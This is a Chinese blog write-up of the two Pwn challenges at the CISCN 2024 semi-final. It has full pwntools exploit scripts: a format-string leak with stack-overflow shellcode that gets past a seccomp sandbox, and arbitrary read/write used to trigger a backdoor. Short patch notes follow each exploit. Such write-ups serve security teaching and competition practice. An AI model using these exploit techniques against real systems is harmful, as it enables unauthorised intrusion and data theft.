2024全国大学生信息安全竞赛(ciscn)半决赛(华东北赛区)Pwn题解

已于 2024-06-26 10:59:13 修改
阅读量902 收藏 17
点赞数 16
分类专栏: CTF 文章标签: 网络安全 CTF 二进制安全 Pwn
于 2024-06-24 16:25:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AtomTeam/article/details/139930000
版权

前言

打过的最离谱的AWDP比赛,8个web,2个pwn。

准备了很久高版本IO、LLVM、Protobuf和Kernel,结果出了2个没libc的栈题。

存在一个严重问题,Break和Fix的靶机是同一个,Fix时会把靶机环境替换。

(明显是AWD平台改的,只是把提交别人Flag得分改为提交自己Flag得分,然后加了Check功能)

(这样的话完全可以上传后门函数或者Shell直接拿下自己靶机得到Flag)

往年华东北的Pwn题是所有赛区最难的,今年成最简单的了,给了2个栈签到题。

抛开题目和靶场不说,给茶歇点赞,空调也很给力。(差点冻死

开局5分钟就看到有人把2个pwn题ak了,这里写一下正解。

image-20240624155039133

Pwn1(ret2shellcode)

Break

沙箱保护

开启了沙箱保护,禁用execve和open:

➜  pwn1 seccomp-tools dump ./pwn
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x09 0xc000003e  if (A != ARCH_X86_64) goto 0011
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x06 0xffffffff  if (A != 0xffffffff) goto 0011
 0005: 0x15 0x05 0x00 0x00000002  if (A == open) goto 0011
 0006: 0x15 0x04 0x00 0x00000013  if (A == readv) goto 0011
 0007: 0x15 0x03 0x00 0x00000014  if (A == writev) goto 0011
 0008: 0x15 0x02 0x00 0x0000003b  if (A == execve) goto 0011
 0009: 0x15 0x01 0x00 0x00000142  if (A == execveat) goto 0011
 0010: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0011: 0x06 0x00 0x00 0x00000000  return KILL

main函数

拖入IDA分析:

image-20240624151738503

菜单,1是栈溢出,2是格式化字符串。并且程序没开启NX保护,栈上可以同时写和执行。

利用思路

直接ret2shellcode执行syscall即可打orw,禁用open用openat替换即可。

通过格式化字符串泄露栈地址和canary,然后写入shellcode,覆盖返回地址为栈地址即可。

由于我写的shellcode比较长,分了2段来执行,也可以优化下汇编一次执行完。

exp

from pwn import *

elf = ELF("./pwn")
libc = ELF("./libc.so.6")
# p = process([elf.path])
p = remote('192.55.1.156', '80')

context(arch=elf.arch, os=elf.os)
context.log_level = 'debug'

# gdb.attach(p, 'b *$rebase(0x14B7)\nc')
# pause()

# leak stack
p.sendlineafter(b'name\n', b'1')
p.sendafter(b'name\n', b'%18$p')
p.sendlineafter(b'name\n', b'2')
p.recvuntil(b'0x')
buf_addr = int(p.recv(12), 16) - 0x60
success('buf_addr = ' + hex(buf_addr))

# leak canary
p.sendlineafter(b'name\n', b'1')
p.sendafter(b'name\n', b'a' * 0x49)
p.sendlineafter(b'name\n', b'2')
p.recvuntil(b'a' * 0x49)
canary = u64(p.recv(7).rjust(8, b'\x00'))
success('canary = ' + hex(canary))

# ret2shellcode
shellcode = asm("""
    mov rax, 0x67616c662f2e ;// ./flag
    push rax
    mov rdi, -100
    mov rsi, rsp
    xor rdx, rdx
    mov rax, 257 ;// SYS_openat
    syscall
    mov rdi, rax ;// fd
    mov rsi, {} ;
    mov rdx, 0x20 ;// nbytes
    xor rax, rax ;// SYS_read
    syscall
    mov rax, {}
    push rax
    ret
""".format(buf_addr, buf_addr + 0x60))
print(hex(len(shellcode)))
shellcode = shellcode.ljust(0x48, b'\x00')
shellcode += p64(canary) + p64(0xdeadbeef) + p64(buf_addr)
shellcode += asm('''
    mov rdi, 1 ;// fd
    mov rsi, {} ;// buf
    mov rax, 1 ;// SYS_write
    syscall
    mov rdi, 123 ;// error_code
    mov rax, 60
    syscall
'''.format(buf_addr))
print(len(shellcode))
p.sendlineafter(b'name\n', b'1')
p.sendafter(b'name\n', shellcode)

# gdb.attach(p, 'b *$rebase(0x14D7)')
# pause()

p.sendlineafter(b'name\n', b'3')

p.interactive()

Fix

Fix很简单,直接把0x60栈溢出改为0x40即可。

Pwn2(backdoor)

Break

还原符号表

题目是静态编译的,可以先导入符号表还原符号:

image-20240624152324229

定位main函数

然后根据字符串交叉引用定位到main函数:

image-20240624152349734

提供几个函数,ls为空函数,其它函数逐个分析。

add函数

add函数:

image-20240624152429259

会在qword_4E82F0分配一个空间,每个空间大小为12。

初始位置为8(即size),偏移量为4的地方可以写入8字节数据。

edit函数

edit函数:

image-20240624152621697

任意地址写。

del函数

del函数:

image-20240624152651630

没用,清空数据。

get函数

get函数:

image-20240624152725511

任意地址读。

check函数

check函数:

image-20240624153018445

调用sub_401D6A函数读取flag,并返回flag的前8个字符。

image-20240624153045418

然后,将flag的前8个字符赋值给magic,并调用evalMagic函数:

image-20240624153131638

它会循环四次,判断前4个空间的值是否和magic相等。如果都相等调用后门函数读取Flag并输出:

image-20240624153221143

利用思路

利用思路很简单,任意写、任意读、存在后门函数。

先让程序执行一次check将flag的前8字节读入到可分配的空间中。

然后任意地址读读出来flag的前8字节,此时magic的值即这8个字节。

然后循环计算出magic的值,通过任意地址写满足if的条件触发后门函数即可。

exp

from pwn import *

elf = ELF("./pwn")
# p = process([elf.path])
p = remote('192.55.1.50', '80')
context(arch=elf.arch, os=elf.os)
context.log_level = 'debug'

# malloc 4 chunks
id = []
for i in range(4):
    p.sendline(b'2')
    p.recvuntil(b'flag\n')
    p.recvuntil(b'flag\n')
    p.recvuntil(b'flag\n')
    p.recvuntil(b'flag\n')
    p.recvuntil(b'flag\n')
    p.recvuntil(b'flag\n')
    p.recvuntil(b':')
    id.append(int(p.recvuntil(b'\x0d\x0a\x3d\x3d\x3d\x3d\x3d', drop=True)[-15:]))

# gdb.attach(p, 'b *0x402117\nc')
# pause()

for x in id:
    print(hex(x))

# leak flag
# p.sendline(b'5')
# p.sendline(str(id[3] + 12).encode())
# magic = 0x4142467b67616c66

# arbitrary_write
n64 = lambda x: (x + 0x10000000000000000) & 0xFFFFFFFFFFFFFFFF
magic = 0x4142467b67616c66
for i in range(4):
    magic = (n64(n64(0x5851F42D4C957F2D * magic) + 12345)) & 0x7FFFFFFFFFFFFFFF
    p.sendline(b'3')
    p.sendline(str(id[i]).encode())
    p.sendline(str(magic).encode())

# check
p.sendline(b'6')

p.interactive()

Fix

Fix实在没什么好说的,后门函数是作者故意写的,而且留了可以任意写和读的漏洞。

刚开始想着正解把任意写和任意读迁移到eh_frame段执行正确的清空和读取操作,但是check失败了。

最后想想这个后门函数也不合理,直接把后门函数nop掉就防御成功了,也就没再深究,很无语。

题目附件

关注公众号【Real返璞归真】回复【ciscn】下载题目附件。

Real返璞归真
关注
  • 16
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
【标题】"baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛" 涉及的是一个信息安全竞赛中的题目,该比赛可能是针对参赛者在网络安全领域,特别是"pwn"类问题解决能力的挑战。"pwn"在黑客术语中通常指的是攻破或...
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
2024 CISCN 东北分区赛-Ahisec
weixin_45906533的博客
06-24 1025
Ahisec战队。
CISCN 2024 赛区半决赛 PWN类全题解
qq_44640531的博客
06-27 1245
这次是我第一次参加线下赛,有点紧张。由于对赛制规则的不了解,导致我patch晚了,丢了很多分,不过取得了14名还是不错的。比赛中pwn类攻了两题,防了三题,vm这题卡在了一个加密函数上,赛后才想明白怎么解,实在是可惜。
PWN · ret2syscall | GoPwn】[2024CISCN · 赛区]go_note
最新发布
Mr_Fmnwon的博客
07-02 826
可以说是做的第一道GoPwn。。。进度确实太慢;此外,除了学习了对GoPwn的调试、逆向,也关注了Gadget利用的一些trick,ret2syscall也又一次进阶式地复习,收获良多。本题受益良多,开心。
基于pwntools和seccomp-tools的awd pwn通防小工具
qq_45595732的博客
06-26 5448
基于pwntools和seccomp-tools的awd pwn通防小工具
记一次bugku awd的pwn
z1r0的博客
03-27 2153
今天闲得没事,随便逛逛的时候看到了bugku awd有战队开了房间,想着没什么事就报名玩了玩,不过pwn题还是很有意思的。 连上去发现是个题。。。再一看加固时间20分钟。。。。(瞬间无语住 直接在网上找题,结果发现网上都是2.23下的,这里笔者拿到的是2.27下的(再次瞬间无语住 没办法只好自己写exp了。拿到pwn附件就是一顿瞎分析,结果发现了upadte有溢出 再随便翻了翻发现还有一个uaf。 只不过没有show函数而已。 再看了一下保护 脑子里瞬间想好了攻击思路,申请到malloc_hoo
PWN综合
WateranFire的博客
09-18 294
感觉pwn的知识比较繁杂,列个目录记录下 bins介绍https://www.cnblogs.com/alisecurity/p/5520847.html 绕过 pie绕过https://blog.csdn.net/WateranFire/article/details/100984579 ...
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
【标题】"Double ciscn 2019 第十二届全国大学生信息安全竞赛"揭示了这是一个信息安全领域的竞赛,特别是针对大学生的。"全国大学生信息安全竞赛"是中国一项具有高影响力的年度赛事,旨在提升大学生信息安全技能,...
ciscn2018-pwn:2018大学生信息安全国赛pwn出题docker
05-11
CISCN2018: May be a calculator? Author Description 开放服务端口为1337 出题模板参考 Category Pwn Deployment cd deploy/ docker-compose up -d Flag //In Docker Container,xxxx代表新的flag echo xxxx > /...
PwnWAF:用于AWD的pwn日志工具
05-16
PWA文件 用于AWD的pwn日志工具 描述 使用traceGen.py生成elf文件。 elf_name:我们要记录哪个elf文件 log_path:日志文件 计算机:此精灵的平台,(仅支持x86 / x86_64) 注意:elf_name和log_path必须是绝对路径 用法: python traceGen.py machine elf_name log_path 例如: python traceGen.py 64 /path/to/elf/test.bin /path/to/log/log.txt elf_name.out是日志文件,然后重命名该文件(或其他文件)以使xinetd引导该文件。 此文件将启动一个子进程以执行elf_name文件,并且父进程将记录信息: +-----+ |child| --> execute /path/to/elf/test.bin
2020第十三届全国大学生信息安全竞赛大部分题目
08-22
除了pwn类题和web的easy_unserialize全都有
awd pwn——LIEF学习
CoLin的pwn小屋
04-04 2082
python LIEF库学习
AWD 一个RE手的PWN机防守有感
Air_cat的博客
12-12 1610
AWD 一个RE手的PWN机防守有感 ①遇到free,不要犹豫,直接patch,我再说一遍,直接patch,全patch,通通patch ②不要试图去干涉数值,除非你十分做好了check down的心理准备
AWD下PWN题流量捕获和反打实验
m0_52249553的博客
05-09 1605
这里用一个vps模拟被攻击的远程主机,并在其上面用tcpdump监听pwn题所在的端口,然后根据攻击流量,编写exp脚本复现攻击。
CISCN东南(AWDP)PWN题全WP
qq_41683953的博客
06-25 1099
CISCN东南(AWDP)PWN题全WP
2023金盾杯awd pwn wp
weixin_51480590的博客
12-04 646
由于浅拷贝,这里仍然可以访问到chunk7的内容,注意到chunk的idx类型为uint_8,所以此时chunk7的索引变成了0x40。将bins中的Node申请出来,此刻索引为7的chunk仍然与浅复制的Node共享chunk,所以我们删除其中一个时,一定会有另一个Node指向,也就是说,调用。为了避免size为0,释放第0个chunk与第7个chunk,这时chunk结构如下图所示,之后,我们再将释放的块申请回来。只不过需要注意的一点是,Chunk的idx类型是uint_8,这也是这道题的重点。
ctf竞赛权威指南pwn篇 pdf
11-05
CTF竞赛权威指南Pwn篇》是一本关于CTF(Capture The Flag)竞赛中的Pwn(利用漏洞攻击代码)题目的权威指南。CTF竞赛是一种网络安全竞赛形式,旨在通过解决各种安全相关的难题来锻炼和提高参赛者的技能。 Pwn篇是该指南中的一个部分,专注于讲解和指导参赛者在CTF竞赛中解决Pwn题目的技巧和方法。Pwn题目会提供一个有漏洞的程序,并要求参赛者利用该漏洞实现攻击,获取对程序的控制权。这需要参赛者具备熟悉各种漏洞类型、编程知识和逆向工程技术的能力。 《CTF竞赛权威指南Pwn篇》通过详细的讲解和示例,帮助读者理解Pwn题目的背景和思路,介绍了与Pwn相关的常见漏洞类型、攻击技巧和工具。该指南提供了从基础到高级的学习路径,帮助读者逐步掌握和提升解决Pwn题目的能力。 该指南还强调了CTF竞赛的实践性和团队协作的重要性。在解析题目和攻击代码的过程中,读者需要灵活运用自己的知识和思维,善于发现和利用漏洞,同时与团队成员合作,进行漏洞挖掘和漏洞利用。 总之,《CTF竞赛权威指南Pwn篇》是一个帮助读者深入了解Pwn题目并提升解决能力的重要指南。通过学习该指南,读者可以更好地参与CTF竞赛,并在解决Pwn题目时展现出自己的技术实力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值